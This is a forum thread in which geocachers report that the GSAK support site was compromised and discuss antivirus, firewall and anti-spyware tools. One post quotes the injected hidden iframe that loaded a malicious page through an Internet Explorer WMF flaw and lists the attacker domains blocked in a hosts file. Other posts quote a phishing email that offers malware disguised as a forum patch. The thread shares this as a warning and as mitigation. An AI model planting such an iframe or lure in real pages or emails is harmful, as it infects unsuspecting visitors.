Jump to content

Gsak Support Forum Virus Warning

Semper Questio
Followers 0

Recommended Posts

Semper Questio

+Semper Questio

Posted
Posted

Just a warning that the GSAK support forum appears to have been hacked and is, at the moment, hosting some sort of virus. I don't know the exact nature of it, but when I went to the forums my anti-virus caught MANY hits that came VERY fast. I had to forcably end my IE task to make it stop.

 

I had also earlier received a bogus email passing itself off as having been from gsak.net wanting me to go to a link for an executable file that offered 'upgrades' for using the GSAK 'message boards'.

 

Perhaps someone else has more info on this?

embra

+embra

Posted
Posted (edited)

I just popped in there and didn't see anything unusual happening with my machine or connection. However, a number of people report getting the following in an email:

tr*ffs*le1.biz/.../loadadv746.exe This link to a patch for our forum. Please install this patch, for correct work of a forum

Needless to say, it would be a bad idea to open that file.

 

I haven't seen anything from Clyde, who may be just waking up from a night's rest about now.

 

Edit: Someone just mentioned on the board that there appears to be some spliced code on the site that exploits an Internet Explorer vulnerability. I use Firefox, which may be why my firewall/AV software wasn't freaking. If you use IE, it's probably a good idea to wait until we get an all clear here.

 

Edit: beejay&esskay made the most excellect suggestion to disable the potentially dangerous link. Done.

Edited by embra
BC Chipmunks

+BC Chipmunks

Posted
Posted

Just a warning that the GSAK support forum appears to have been hacked and is, at the moment, hosting some sort of virus. I don't know the exact nature of it, but when I went to the forums my anti-virus caught MANY hits that came VERY fast. I had to forcably end my IE task to make it stop.

 

I had also earlier received a bogus email passing itself off as having been from gsak.net wanting me to go to a link for an executable file that offered 'upgrades' for using the GSAK 'message boards'.

 

Perhaps someone else has more info on this?

 

 

Just had same probem so emailed Clyde with the question I was just going to ask on the GSAK forum

:mad:

Jurgen & co

+Jurgen & co

Posted
Posted

It cost me a lot of time and nervs to get my computer clean again. I had a loader from visiting the gsak site. And after that a became a lot of s***. After my worning I had cut the line and cleaned my computer with avg and www.hitmanpro.nl. Also I closed my firewall i install yesterday whery tide. I didn't had the time to do that yesterday. Also i became a email that looks as it came from clyde with the same loader in it so please don't open. There is a link in it with somting like traficsale. You wil get a lot of s***.

TamCo

+TamCo

Posted
Posted

When I was at the GSAK Support site I recieved a Trojan virus. It went into my computer very fast. It took me awhile to get my computer back to working order. An all clear from someone would be nice.

embra

+embra

Posted
Posted

Things all cleared up. Clyde cleaned up the problem, it's safe to go back in the water. (But if you got the email with that link, you *still* don't want to click it).

Suscrofa

Suscrofa

Posted
Posted (edited)

Never get anything and I have neither a firewall nor antivirus ! :mad:

By experience, these are on an average a bigger pain than the virus themselves.

Updated software, Firefox browser and common sense are the best antivirus.

Except for the one taking advantages of loophole in the OS (usualy the com layers), Browser, the vast majority of these are using loopholes of the human mind that make him gullible and overconfident.

ANd I receive my share of emails from my "bank" asking to connect to verify my credentials, movies from Ben Laden, offer from Nigeria to help them tranfer money, not to mention enlargemnt pills for what you know ! :mad:

Edited by Suscrofa
ProsperoDK

+ProsperoDK

Posted
Posted

I posted this on the GSAK forum yesterday:

 

Somehow the following lines 

<body>
<iframe src="http://traffsale1.biz/dl/adv746.php" width=1 height=1></iframe>
<body>

have been added at the top and the bottom of the page.

 

It's trying to use the WMF-vulnerability that went out last year, check SANS.

 

Look for the patch from Microsoft, search for KB912919.

The patch is here.

 

Taking the names from the SANS article and adding them to my host file pointing to 127.0.0.1 and doing the same with the names with an added 1 as in the iframe above, and applying the patch from Microsoft, I can now enter the forum without my antivirus blowing up with bells and whistles.

 

This is the list I added to my host file (C:\WINDOWS\system32\drivers\etc\hosts):

127.0.0.1 traffsale.biz
127.0.0.1 iframesite.biz
127.0.0.1 iframetraff.biz
127.0.0.1 toolbartraff.biz
127.0.0.1 buytraff.biz
127.0.0.1 iframecash.biz
127.0.0.1 toolbarurl.biz
127.0.0.1 iframebiz.biz
127.0.0.1 toolbarbiz.biz
127.0.0.1 traffsale1.biz
127.0.0.1 iframesite1.biz
127.0.0.1 iframetraff1.biz
127.0.0.1 toolbartraff1.biz
127.0.0.1 buytraff1.biz
127.0.0.1 iframecash1.biz
127.0.0.1 toolbarurl1.biz
127.0.0.1 iframebiz1.biz
127.0.0.1 toolbarbiz1.biz

 

After the scare I did a full scan with McAfee and Spybot - Search & Destroy and fortunately nothing got on my PC, but that took 2½-3 hours to verify.

 

Here's another write-up on the vulnerability: pcdoctor-guide

 

ProsperoDK/René

Kai Team

+Kai Team

Posted
Posted

Never get anything and I have neither a firewall nor antivirus ! :lol:

 

Uh - if you have neither a firewall nor an antivirus program, how would you know if you "got anything"? That's like saying "I'm in perfect health and I have never had a medical test". Ignorance is not bliss in today's world. A scan of your computer with an up-to-date antivirus program might surprise you. :lol:

Segerguy

+Segerguy

Posted
Posted

Never get anything and I have neither a firewall nor antivirus ! :lol:

By experience, these are on an average a bigger pain than the virus themselves.

Updated software, Firefox browser and common sense are the best antivirus.

Except for the one taking advantages of loophole in the OS (usualy the com layers), Browser, the vast majority of these are using loopholes of the human mind that make him gullible and overconfident.

ANd I receive my share of emails from my "bank" asking to connect to verify my credentials, movies from Ben Laden, offer from Nigeria to help them tranfer money, not to mention enlargemnt pills for what you know ! :lol:

 

You and your computer are living VERY dangerously my friend! I hope you will reconsider and get both the anti virus and the firewall.

TotemLake

+TotemLake

Posted
Posted

Never get anything and I have neither a firewall nor antivirus ! :lol:

By experience, these are on an average a bigger pain than the virus themselves.

Updated software, Firefox browser and common sense are the best antivirus.

Except for the one taking advantages of loophole in the OS (usualy the com layers), Browser, the vast majority of these are using loopholes of the human mind that make him gullible and overconfident.

ANd I receive my share of emails from my "bank" asking to connect to verify my credentials, movies from Ben Laden, offer from Nigeria to help them tranfer money, not to mention enlargemnt pills for what you know ! :lol:

 

Firewalls and AV programs don't stop the e-mails from coming in. Online junk filters will stop some e-mails, and locally hosted junk filters will reroute some to a folder.

 

Firewalls keep intruders out, and AV programs protect your system from gaining the virii and trojans while on line. There are bots and worms out there now that will infiltrate your system for just being online; broadband makes it easier to happen. If you don't have anything protecting you, you're already infected and choose to ignore it in the face of all the information that is out there warning you against the lack of protection. You are gullible in your own self-assurance you don't need it unless you never go online.

Miragee

+Miragee

Posted
Posted

Never get anything and I have neither a firewall nor antivirus ! :)

Before I had an Antivirus program that did automatic updates, I got a nasty Trojan three days after its presence was detected on the Internet. I had not updated my Antivirus for several days. That infection required me to reinstall my OS. :lol: After that I installed ZoneAlarm and got the AVG Antivirus.

 

By experience, these are on an average a bigger pain than the virus themselves.

AVG Antivirus is free and trouble-free. I've used it for years and highly recommend it.

 

Updated software, Firefox browser and common sense are the best antivirus.

I use the wonderful Opera browser and agree that using an alternate browser is much better than using IE.

 

Except for the one taking advantages of loophole in the OS (usualy the com layers), Browser, the vast majority of these are using loopholes of the human mind that make him gullible and overconfident.

 

And I receive my share of emails from my "bank" asking to connect to verify my credentials, movies from Ben Laden, offer from Nigeria to help them tranfer money, not to mention enlargemnt pills for what you know ! :)

By changing my email address/es and being very careful where they are shared, I can proudly say I no longer get those emails . . . except the ones I get because I have an eBay account. :lol:

 

I would be curious to see the report you get if you download and run Spybot -- Search and Destroy, AdAware, and AVG Antivirus. I think you will be horrified . . .

Suscrofa

Suscrofa

Posted
Posted

I update my OS regularly of course ! No shared device, no Microsoft network but just TCP/IP, I only connect to the net (10Mb/s ADSL) under a low priviledge account, I use emails from MS, Yahoo and the like for general purpose. They get all the crap and sort it out for me !

My real one, only for specifics and trusted people and even, I check if what they send matches with their regular behavior.

All my personal datas are encrypted on PGP disks (2 separate physical disks) and never when I am on line.

 

Most harmfull stuff you get it when you act deliberately (you run an exexc while thinking its a free movie for ex.) and most of the time received from emails. Virus are out there before your antivirus is ready to take care of it no ?

 

Of course I regularly scan with an on line antivirus and malware programs !

Airmapper

+Airmapper

Posted
Posted

Can anyone give me the names of a free spyware/ keylogger/ and anything else software? I have avast! anti virus, and so far I think it's good. I have IE, but might consider changing it if needed. I only have a 24000bps connection, so I'm not as vulnerable as some, but I still want to keep my system secure. Any advice would be appreciated.

Miragee

+Miragee

Posted
Posted

I didn't think anyone else had as slow a connection as mine . . .my sympathies. :lol:

 

I have used the Free Grisoft AVG Antivirus program for many years.

 

I really like the Opera browser. It is free now, but I liked it so much I purchased it four years ago. It is very sophisticated and loaded with features. :lol:

 

"Spybot -- Search and Destroy" and "AdAware" are two programs that are free. They look for spyware and malware on a system.

Toby's Gang

+Toby's Gang

Posted
Posted
I didn't think anyone else had as slow a connection as mine . . .my sympathies. :lol:

 

I have used the Free Grisoft AVG Antivirus program for many years.

 

I really like the Opera browser. It is free now, but I liked it so much I purchased it four years ago. It is very sophisticated and loaded with features. :lol:

 

"Spybot -- Search and Destroy" and "AdAware" are two programs that are free. They look for spyware and malware on a system.

 

I run Microsoft Antispyware (Windows Defender as it is now called) and it's free. I've had pretty good luck with it as I haven't had any problems with spyware since I installed it.

The good thing about it is it is active, which means it runs in the background like an anti-virus software does so it catches unwanted software before it has a chance to install itself.

Miragee

+Miragee

Posted
Posted

Just for kicks, I ran Spybot -- Search and Destroy and AdAware for the first time in more than a year.

 

Since I use Opera, which has a different "design" from IE, I had no Adware or Spyware, at all, on this computer. thumbsup.gif

TotemLake

+TotemLake

Posted
Posted (edited)

Just for kicks, I ran Spybot -- Search and Destroy and AdAware for the first time in more than a year.

 

Since I use Opera, which has a different "design" from IE, I had no Adware or Spyware, at all, on this computer. thumbsup.gif

You should try spysweeper. You'll be amazed at what spybot and adaware misses.

Edited by TotemLake
Miragee

+Miragee

Posted
Posted

Well, if I thought I needed it, and if I had $29.95, maybe I would try it.

 

But I really think using Opera helps prevent Spyware and Adware infections, and since my computer works really well, for an old Pentium III 686, I don't need to spend that money on something non-Geocaching-related. :lol:

Cheminer Will

+Cheminer Will

Posted
Posted

Never get anything and I have neither a firewall nor antivirus ! :lol:

By experience, these are on an average a bigger pain than the virus themselves.

 

I went to the GSAK site while it was infected and my antivirus software informed me that it blocked a worm or trojan. In my mind, this one block was worth any effort spent to install and maintain the AV software!

 

I did not get the e-mail. Some did and others didn't. Wonder what the criteria for receiving it was?

TotemLake

+TotemLake

Posted
Posted

Well, if I thought I needed it, and if I had $29.95, maybe I would try it.

 

But I really think using Opera helps prevent Spyware and Adware infections, and since my computer works really well, for an old Pentium III 686, I don't need to spend that money on something non-Geocaching-related. :mad:

 

Just for the record, my experience with all three of these products is two of them are deficient and do not catch 93% of the crud that's out there combined. I know because I used to use them and was surprised at what Spysweeper cleaned out after they declared my system clean. There is a reason why Spysweeper has been rated the best anti-spyware software for the last 5 years. I recommend this software and AVG to my customers as the best combination for keeping your system clean. MS beta anti-spyware is good, but it's about to go fee based at 49.95 p/yr.

Miragee

+Miragee

Posted
Posted

By the way, CompUSA has a deal on SpySweeper. Free for people who are upgrading; only $10.00 for people purchasing it for the first time.

 

I found out about that from Techbargains.

 

If I was having any problems with my computer I would probably get it.

Wild Thing 73

+Wild Thing 73

Posted
Posted

Never get anything and I have neither a firewall nor antivirus ! :D

By experience, these are on an average a bigger pain than the virus themselves.

Updated software, Firefox browser and common sense are the best antivirus.

Except for the one taking advantages of loophole in the OS (usualy the com layers), Browser, the vast majority of these are using loopholes of the human mind that make him gullible and overconfident.

ANd I receive my share of emails from my "bank" asking to connect to verify my credentials, movies from Ben Laden, offer from Nigeria to help them tranfer money, not to mention enlargemnt pills for what you know ! :D

 

Congrats: you fired up the community - I have received some helpful info on Virus control, etc... I just hope your PC does not crash. I just hate it when my PC crashes. Good luck, Guy :D

Hynr

+Hynr

Posted
Posted

There seems to me to be a misconception here that Firewalls are there to deal with viruses. They might play a role there, but a firewall does much more important things; it keeps folks out of your computer. I had an old computer working as datalogger in my lab (no email, no browsing, no firewall - i.e. "wide open") hooked up to our LAN so we could get at the data from our workstations. One day our IT guys came to complain about a lot of traffic from one of our machines and we discovered that someone was using our datalogging computer as an mp3 server. It didn't take long to shut that down and to install a firewall to prevent it from happening again.

Wacka

+Wacka

Posted
Posted

Best protection against viruses, adaware and malware::

 

Mac OSX :D

 

Virus free since 1987.

Well at least until February 16, 2006

 

Read the follow up articles. The guy let anyone who wanted to try have am account on the computer! That's the same as being iat the keyboard.

Another person put the normal settings on a Mac and had to shut the challenge down after 36 hours with no successes. There was too much traffic on the network to the Mac. Lots of people were trying, but no one could succeed.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...
×
Followers 0
Go to topic listing
×
×
  • Create New...